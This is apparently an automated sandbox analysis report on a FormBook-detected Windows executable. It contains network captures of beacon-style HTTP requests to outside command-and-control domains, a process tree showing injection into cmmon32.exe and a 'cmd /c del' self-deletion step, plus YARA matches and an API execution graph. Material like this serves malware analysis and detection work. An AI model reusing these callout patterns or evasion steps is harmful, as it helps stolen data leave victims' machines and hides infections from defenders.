                                                                                                              Jun 10, 2021 14:37:18.730845928 CEST3422INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 20 3c 68 33 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c
                                                                                                              Data Ascii: container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely cause
                                                                                                              Jun 10, 2021 14:37:18.730884075 CEST3424INData Raw: 3b 26 6e 62 73 70 3b 53 74 61 74 69 63 46 69 6c 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 45 72 72 6f 72 20 43 6f 64 65 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 30 78 38 30
                                                                                                              Data Ascii: ;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Request


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.2.349749160.153.136.380C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:37:28.964153051 CEST3434OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1
                                                                                                              Host: www.growwithjenn.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:37:29.018930912 CEST3434INHTTP/1.1 400 Bad Request
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.2.34975034.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:37:34.135488033 CEST3435OUTGET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
                                                                                                              Host: www.bring-wellness.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:37:34.273370028 CEST3435INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 10 Jun 2021 12:37:34 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "60c03ab8-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: UGGJ4NnzFz.exe PID: 4884 Parent PID: 5660

                                                                                                              General

                                                                                                              Start time:14:35:29
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:223620 bytes
                                                                                                              MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: UGGJ4NnzFz.exe PID: 5520 Parent PID: 4884

                                                                                                              General

                                                                                                              Start time:14:35:30
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:223620 bytes
                                                                                                              MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: explorer.exe PID: 3388 Parent PID: 5520

                                                                                                              General

                                                                                                              Start time:14:35:35
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:
                                                                                                              Imagebase:0x7ff714890000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: cmmon32.exe PID: 6512 Parent PID: 3388

                                                                                                              General

                                                                                                              Start time:14:35:56
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Imagebase:0xca0000
                                                                                                              File size:36864 bytes
                                                                                                              MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: cmd.exe PID: 6668 Parent PID: 6512

                                                                                                              General

                                                                                                              Start time:14:36:01
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0xbd0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 6676 Parent PID: 6668

                                                                                                              General

                                                                                                              Start time:14:36:01
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Analysis Process: UGGJ4NnzFz.exe PID: 4884 Parent PID: 5660 UGGJ4NnzFz.exeCOMMON

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.4%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:20.9%
                                                                                                                Total number of Nodes:1486
                                                                                                                Total number of Limit Nodes:31

                                                                                                                Graph

                                                                                                                execution_graph 4664 401cc1 GetDlgItem GetClientRect 4665 4029f6 18 API calls 4664->4665 4666 401cf1 LoadImageA SendMessageA 4665->4666 4667 40288b 4666->4667 4668 401d0f DeleteObject 4666->4668 4668->4667 4669 401dc1 4670 4029f6 18 API calls 4669->4670 4671 401dc7 4670->4671 4672 4029f6 18 API calls 4671->4672 4673 401dd0 4672->4673 4674 4029f6 18 API calls 4673->4674 4675 401dd9 4674->4675 4676 4029f6 18 API calls 4675->4676 4677 401de2 4676->4677 4678 401423 25 API calls 4677->4678 4679 401de9 ShellExecuteA 4678->4679 4680 401e16 4679->4680 4681 405042 4682 405063 GetDlgItem GetDlgItem GetDlgItem 4681->4682 4683 4051ee 4681->4683 4727 403f4d SendMessageA 4682->4727 4685 4051f7 GetDlgItem CreateThread CloseHandle 4683->4685 4686 40521f 4683->4686 4685->4686 4688 40524a 4686->4688 4689 405236 ShowWindow ShowWindow 4686->4689 4690 40526c 4686->4690 4687 4050d4 4692 4050db GetClientRect GetSystemMetrics SendMessageA SendMessageA 4687->4692 4691 4052a8 4688->4691 4694 405281 ShowWindow 4688->4694 4695 40525b 4688->4695 4732 403f4d SendMessageA 4689->4732 4736 403f7f 4690->4736 4691->4690 4701 4052b3 SendMessageA 4691->4701 4699 40514a 4692->4699 4700 40512e SendMessageA SendMessageA 4692->4700 4697 4052a1 4694->4697 4698 405293 4694->4698 4733 403ef1 4695->4733 4704 403ef1 SendMessageA 4697->4704 4703 404f04 25 API calls 4698->4703 4705 40515d 4699->4705 4706 40514f SendMessageA 4699->4706 4700->4699 4707 4052cc CreatePopupMenu 4701->4707 4708 40527a 4701->4708 4703->4697 4704->4691 4728 403f18 4705->4728 4706->4705 4709 405b88 18 API calls 4707->4709 4711 4052dc AppendMenuA 4709->4711 4713 405302 4711->4713 4714 4052ef GetWindowRect 4711->4714 4712 40516d 4715 405176 ShowWindow 4712->4715 4716 4051aa GetDlgItem SendMessageA 4712->4716 4718 40530b TrackPopupMenu 4713->4718 4714->4718 4719 405199 4715->4719 4720 40518c ShowWindow 4715->4720 4716->4708 4717 4051d1 SendMessageA SendMessageA 4716->4717 4717->4708 4718->4708 4721 405329 4718->4721 4731 403f4d SendMessageA 4719->4731 4720->4719 4722 405345 SendMessageA 4721->4722 4722->4722 4724 405362 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4722->4724 4725 405384 SendMessageA 4724->4725 4725->4725 4726 4053a5 GlobalUnlock SetClipboardData CloseClipboard 4725->4726 4726->4708 4727->4687 4729 405b88 18 API calls 4728->4729 4730 403f23 SetDlgItemTextA 4729->4730 4730->4712 4731->4716 4732->4688 4734 403ef8 4733->4734 4735 403efe SendMessageA 4733->4735 4734->4735 4735->4690 4737 403f97 GetWindowLongA 4736->4737 4738 404020 4736->4738 4737->4738 4739 403fa8 4737->4739 4738->4708 4740 403fb7 GetSysColor 4739->4740 4741 403fba 4739->4741 4740->4741 4742 403fc0 SetTextColor 4741->4742 4743 403fca SetBkMode 4741->4743 4742->4743 4744 403fe2 GetSysColor 4743->4744 4745 403fe8 4743->4745 4744->4745 4746 403ff9 4745->4746 4747 403fef SetBkColor 4745->4747 4746->4738 4748 404013 CreateBrushIndirect 4746->4748 4749 40400c DeleteObject 4746->4749 4747->4746 4748->4738 4749->4748 4750 401645 4751 4029f6 18 API calls 4750->4751 4752 40164c 4751->4752 4753 4029f6 18 API calls 4752->4753 4754 401655 4753->4754 4755 4029f6 18 API calls 4754->4755 4756 40165e MoveFileA 4755->4756 4757 40166a 4756->4757 4758 401671 4756->4758 4760 401423 25 API calls 4757->4760 4759 405e61 2 API calls 4758->4759 4762 402169 4758->4762 4761 401680 4759->4761 4760->4762 4761->4762 4763 4058b4 38 API calls 4761->4763 4763->4757 4764 403a45 4765 403b98 4764->4765 4766 403a5d 4764->4766 4767 403ba9 GetDlgItem GetDlgItem 4765->4767 4776 403be9 4765->4776 4766->4765 4768 403a69 4766->4768 4771 403f18 19 API calls 4767->4771 4769 403a74 SetWindowPos 4768->4769 4770 403a87 4768->4770 4769->4770 4773 403aa4 4770->4773 4774 403a8c ShowWindow 4770->4774 4775 403bd3 SetClassLongA 4771->4775 4772 403c43 4777 403f64 SendMessageA 4772->4777 4782 403b93 4772->4782 4778 403ac6 4773->4778 4779 403aac DestroyWindow 4773->4779 4774->4773 4780 40140b 2 API calls 4775->4780 4776->4772 4781 401389 2 API calls 4776->4781 4804 403c55 4777->4804 4784 403acb SetWindowLongA 4778->4784 4785 403adc 4778->4785 4783 403ea1 4779->4783 4780->4776 4786 403c1b 4781->4786 4783->4782 4792 403ed2 ShowWindow 4783->4792 4784->4782 4789 403b53 4785->4789 4790 403ae8 GetDlgItem 4785->4790 4786->4772 4791 403c1f SendMessageA 4786->4791 4787 40140b 2 API calls 4787->4804 4788 403ea3 DestroyWindow EndDialog 4788->4783 4795 403f7f 8 API calls 4789->4795 4793 403b18 4790->4793 4794 403afb SendMessageA IsWindowEnabled 4790->4794 4791->4782 4792->4782 4797 403b25 4793->4797 4798 403b38 4793->4798 4799 403b6c SendMessageA 4793->4799 4807 403b1d 4793->4807 4794->4782 4794->4793 4795->4782 4796 405b88 18 API calls 4796->4804 4797->4799 4797->4807 4802 403b40 4798->4802 4803 403b55 4798->4803 4799->4789 4800 403ef1 SendMessageA 4800->4789 4801 403f18 19 API calls 4801->4804 4805 40140b 2 API calls 4802->4805 4806 40140b 2 API calls 4803->4806 4804->4782 4804->4787 4804->4788 4804->4796 4804->4801 4808 403f18 19 API calls 4804->4808 4823 403de3 DestroyWindow 4804->4823 4805->4807 4806->4807 4807->4789 4807->4800 4809 403cd0 GetDlgItem 4808->4809 4810 403ce5 4809->4810 4811 403ced ShowWindow EnableWindow 4809->4811 4810->4811 4832 403f3a EnableWindow 4811->4832 4813 403d17 EnableWindow 4816 403d2b 4813->4816 4814 403d30 GetSystemMenu EnableMenuItem SendMessageA 4815 403d60 SendMessageA 4814->4815 4814->4816 4815->4816 4816->4814 4833 403f4d SendMessageA 4816->4833 4834 405b66 lstrcpynA 4816->4834 4819 403d8e lstrlenA 4820 405b88 18 API calls 4819->4820 4821 403d9f SetWindowTextA 4820->4821 4822 401389 2 API calls 4821->4822 4822->4804 4823->4783 4824 403dfd CreateDialogParamA 4823->4824 4824->4783 4825 403e30 4824->4825 4826 403f18 19 API calls 4825->4826 4827 403e3b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4826->4827 4828 401389 2 API calls 4827->4828 4829 403e81 4828->4829 4829->4782 4830 403e89 ShowWindow 4829->4830 4831 403f64 SendMessageA 4830->4831 4831->4783 4832->4813 4833->4816 4834->4819 4835 401ec5 4836 4029f6 18 API calls 4835->4836 4837 401ecc GetFileVersionInfoSizeA 4836->4837 4838 401eef GlobalAlloc 4837->4838 4845 401f45 4837->4845 4839 401f03 GetFileVersionInfoA 4838->4839 4838->4845 4840 401f14 VerQueryValueA 4839->4840 4839->4845 4841 401f2d 4840->4841 4840->4845 4846 405ac4 wsprintfA 4841->4846 4843 401f39 4847 405ac4 wsprintfA 4843->4847 4846->4843 4847->4845 4851 4025cc 4852 4025d3 4851->4852 4853 402838 4851->4853 4859 4029d9 4852->4859 4855 4025de 4856 4025e5 SetFilePointer 4855->4856 4856->4853 4857 4025f5 4856->4857 4862 405ac4 wsprintfA 4857->4862 4860 405b88 18 API calls 4859->4860 4861 4029ed 4860->4861 4861->4855 4862->4853 3924 401f51 3925 401f63 3924->3925 3926 402012 3924->3926 3945 4029f6 3925->3945 3928 401423 25 API calls 3926->3928 3935 402169 3928->3935 3930 4029f6 18 API calls 3931 401f73 3930->3931 3932 401f88 LoadLibraryExA 3931->3932 3933 401f7b GetModuleHandleA 3931->3933 3932->3926 3934 401f98 GetProcAddress 3932->3934 3933->3932 3933->3934 3936 401fe5 3934->3936 3937 401fa8 3934->3937 3996 404f04 3936->3996 3938 401fb0 3937->3938 3939 401fc7 3937->3939 3993 401423 3938->3993 3951 737516db 3939->3951 3942 401fb8 3942->3935 3943 402006 FreeLibrary 3942->3943 3943->3935 3946 402a02 3945->3946 4007 405b88 3946->4007 3949 401f6a 3949->3930 3952 7375170b 3951->3952 4047 73751a98 3952->4047 3954 73751712 3955 73751834 3954->3955 3956 73751723 3954->3956 3957 7375172a 3954->3957 3955->3942 4098 737522af 3956->4098 4081 737522f1 3957->4081 3962 73751770 4111 737524d8 3962->4111 3963 7375178e 3965 73751794 3963->3965 3966 737517dc 3963->3966 3964 73751759 3978 7375174f 3964->3978 4108 73752cc3 3964->4108 4130 7375156b 3965->4130 3972 737524d8 10 API calls 3966->3972 3968 73751740 3969 73751746 3968->3969 3974 73751751 3968->3974 3969->3978 4092 73752a38 3969->4092 3979 737517cd 3972->3979 3973 73751776 4122 73751559 3973->4122 4102 737526b2 3974->4102 3978->3962 3978->3963 3984 73751823 3979->3984 4136 7375249e 3979->4136 3981 73751757 3981->3978 3982 737524d8 10 API calls 3982->3979 3984->3955 3986 7375182d GlobalFree 3984->3986 3986->3955 3990 7375180f 3990->3984 4140 737514e2 wsprintfA 3990->4140 3992 73751808 FreeLibrary 3992->3990 3994 404f04 25 API calls 3993->3994 3995 401431 3994->3995 3995->3942 3997 404fc2 3996->3997 3998 404f1f 3996->3998 3997->3942 3999 404f3c lstrlenA 3998->3999 4000 405b88 18 API calls 3998->4000 4001 404f65 3999->4001 4002 404f4a lstrlenA 3999->4002 4000->3999 4004 404f78 4001->4004 4005 404f6b SetWindowTextA 4001->4005 4002->3997 4003 404f5c lstrcatA 4002->4003 4003->4001 4004->3997 4006 404f7e SendMessageA SendMessageA SendMessageA 4004->4006 4005->4004 4006->3997 4011 405b95 4007->4011 4008 405daf 4009 402a23 4008->4009 4042 405b66 lstrcpynA 4008->4042 4009->3949 4026 405dc8 4009->4026 4011->4008 4012 405c2d GetVersion 4011->4012 4013 405d86 lstrlenA 4011->4013 4015 405b88 10 API calls 4011->4015 4021 405dc8 5 API calls 4011->4021 4040 405ac4 wsprintfA 4011->4040 4041 405b66 lstrcpynA 4011->4041 4019 405c3a 4012->4019 4013->4011 4015->4013 4018 405ca5 GetSystemDirectoryA 4018->4019 4019->4011 4019->4018 4020 405cb8 GetWindowsDirectoryA 4019->4020 4022 405b88 10 API calls 4019->4022 4023 405d2f lstrcatA 4019->4023 4024 405cec SHGetSpecialFolderLocation 4019->4024 4035 405a4d RegOpenKeyExA 4019->4035 4020->4019 4021->4011 4022->4019 4023->4011 4024->4019 4025 405d04 SHGetPathFromIDListA CoTaskMemFree 4024->4025 4025->4019 4027 405dd4 4026->4027 4029 405e31 CharNextA 4027->4029 4030 405e3c 4027->4030 4033 405e1f CharNextA 4027->4033 4034 405e2c CharNextA 4027->4034 4043 405684 4027->4043 4028 405e40 CharPrevA 4028->4030 4029->4027 4029->4030 4030->4028 4031 405e5b 4030->4031 4031->3949 4033->4027 4034->4029 4036 405a80 RegQueryValueExA 4035->4036 4037 405abe 4035->4037 4038 405aa1 RegCloseKey 4036->4038 4037->4019 4038->4037 4040->4011 4041->4011 4042->4009 4044 40568a 4043->4044 4045 40569d 4044->4045 4046 405690 CharNextA 4044->4046 4045->4027 4046->4044 4143 73751215 GlobalAlloc 4047->4143 4049 73751abf 4144 73751215 GlobalAlloc 4049->4144 4051 73751d00 GlobalFree GlobalFree GlobalFree 4052 73751d1d 4051->4052 4065 73751d67 4051->4065 4053 737520f1 4052->4053 4061 73751d32 4052->4061 4052->4065 4055 73752113 GetModuleHandleA 4053->4055 4053->4065 4054 73751bbd GlobalAlloc 4071 73751aca 4054->4071 4058 73752124 LoadLibraryA 4055->4058 4059 73752139 4055->4059 4056 73751c08 lstrcpyA 4060 73751c12 lstrcpyA 4056->4060 4057 73751c26 GlobalFree 4057->4071 4058->4059 4058->4065 4151 737515c2 GetProcAddress 4059->4151 4060->4071 4061->4065 4147 73751224 4061->4147 4063 7375218a 4063->4065 4068 73752197 lstrlenA 4063->4068 4064 73751fb7 4150 73751215 GlobalAlloc 4064->4150 4065->3954 4152 737515c2 GetProcAddress 4068->4152 4069 7375214b 4069->4063 4079 73752174 GetProcAddress 4069->4079 4071->4051 4071->4054 4071->4056 4071->4057 4071->4060 4071->4064 4071->4065 4072 73751ef9 GlobalFree 4071->4072 4073 73752033 4071->4073 4074 73751224 2 API calls 4071->4074 4075 73751c64 4071->4075 4072->4071 4073->4065 4078 7375208c lstrcpyA 4073->4078 4074->4071 4075->4071 4145 73751534 GlobalSize GlobalAlloc 4075->4145 4076 737521b0 4076->4065 4078->4065 4079->4063 4080 73751fbf 4080->3954 4082 7375230a 4081->4082 4084 73752446 GlobalFree 4082->4084 4085 737523b8 GlobalAlloc MultiByteToWideChar 4082->4085 4087 73752405 4082->4087 4088 73751224 GlobalAlloc lstrcpynA 4082->4088 4154 737512ad 4082->4154 4084->4082 4086 73751730 4084->4086 4085->4087 4089 737523e4 GlobalAlloc 4085->4089 4086->3964 4086->3968 4086->3978 4087->4084 4158 73752646 4087->4158 4088->4082 4090 737523fc GlobalFree 4089->4090 4090->4084 4094 73752a4a 4092->4094 4093 73752aef EnumSystemCodePagesW 4095 73752b0d 4093->4095 4094->4093 4161 737529e4 4095->4161 4097 73752bd9 4097->3978 4099 737522c4 4098->4099 4100 737522cf GlobalAlloc 4099->4100 4101 73751729 4099->4101 4100->4099 4101->3957 4106 737526e2 4102->4106 4103 73752790 4105 73752796 GlobalSize 4103->4105 4107 737527a0 4103->4107 4104 7375277d GlobalAlloc 4104->4107 4105->4107 4106->4103 4106->4104 4107->3981 4109 73752cce 4108->4109 4110 73752d0e GlobalFree 4109->4110 4165 73751215 GlobalAlloc 4111->4165 4113 73752563 lstrcpynA 4115 737524e4 4113->4115 4114 73752598 WideCharToMultiByte 4114->4115 4115->4113 4115->4114 4116 737525b9 wsprintfA 4115->4116 4117 737525dd GlobalFree 4115->4117 4118 73752583 WideCharToMultiByte 4115->4118 4119 73752617 GlobalFree 4115->4119 4120 73751266 2 API calls 4115->4120 4166 737512d1 4115->4166 4116->4115 4117->4115 4118->4115 4119->3973 4120->4115 4170 73751215 GlobalAlloc 4122->4170 4124 7375155e 4125 7375156b 2 API calls 4124->4125 4126 73751568 4125->4126 4127 73751266 4126->4127 4128 7375126f GlobalAlloc lstrcpynA 4127->4128 4129 737512a8 GlobalFree 4127->4129 4128->4129 4129->3979 4131 737515a4 lstrcpyA 4130->4131 4132 73751577 wsprintfA 4130->4132 4135 737515bd 4131->4135 4132->4135 4135->3982 4137 737517ef 4136->4137 4138 737524ac 4136->4138 4137->3990 4137->3992 4138->4137 4139 737524c5 GlobalFree 4138->4139 4139->4138 4141 73751266 2 API calls 4140->4141 4142 73751503 4141->4142 4142->3984 4143->4049 4144->4071 4146 73751552 4145->4146 4146->4075 4153 73751215 GlobalAlloc 4147->4153 4149 73751233 lstrcpynA 4149->4065 4150->4080 4151->4069 4152->4076 4153->4149 4155 737512b4 4154->4155 4156 73751224 2 API calls 4155->4156 4157 737512cf 4156->4157 4157->4082 4159 73752654 VirtualAlloc 4158->4159 4160 737526aa 4158->4160 4159->4160 4160->4087 4162 737529ef 4161->4162 4163 737529f4 GetLastError 4162->4163 4164 737529ff 4162->4164 4163->4164 4164->4097 4165->4115 4167 737512f9 4166->4167 4168 737512da 4166->4168 4167->4115 4168->4167 4169 737512e0 lstrcpyA 4168->4169 4169->4167 4170->4124 4870 404853 GetDlgItem GetDlgItem 4871 4048a7 7 API calls 4870->4871 4874 404ac4 4870->4874 4872 404940 SendMessageA 4871->4872 4873 40494d DeleteObject 4871->4873 4872->4873 4875 404958 4873->4875 4881 404bae 4874->4881 4898 404b38 4874->4898 4923 4047d3 SendMessageA 4874->4923 4876 40498f 4875->4876 4878 405b88 18 API calls 4875->4878 4879 403f18 19 API calls 4876->4879 4877 404c5d 4882 404c72 